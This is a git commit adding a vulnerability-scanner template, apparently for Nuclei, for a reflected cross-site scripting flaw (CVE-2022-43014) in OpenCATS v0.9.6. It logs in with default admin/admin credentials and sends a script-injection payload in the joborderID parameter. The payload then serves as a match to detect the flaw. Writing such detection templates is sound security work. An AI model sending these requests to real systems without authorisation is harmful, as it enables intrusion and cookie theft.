Create CVE-2022-43014.yaml
parent
5132ff636e
commit
b9c0977e5f
|
@ -0,0 +1,37 @@
|
|||
id: CVE-2022-43014
|
||||
|
||||
info:
|
||||
name: OpenCATS - Cross Site Scripting
|
||||
author: arafatansari
|
||||
severity: medium
|
||||
description: |
|
||||
OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the joborderID parameter.
|
||||
reference:
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43014
|
||||
tags: xss,cve,2022
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /index.php?m=login&a=attemptLogin HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
username=admin&password=admin
|
||||
|
||||
- |
|
||||
GET /ajax.php?f=getPipelineJobOrder&joborderID=1)"></a>%20<script>alert(document.cookie)</script>&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
host-redirects: true
|
||||
max-redirects: 2
|
||||
cookie-reuse: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- '<script>alert(document.cookie)</script>'
|
Loading…
Reference in New Issue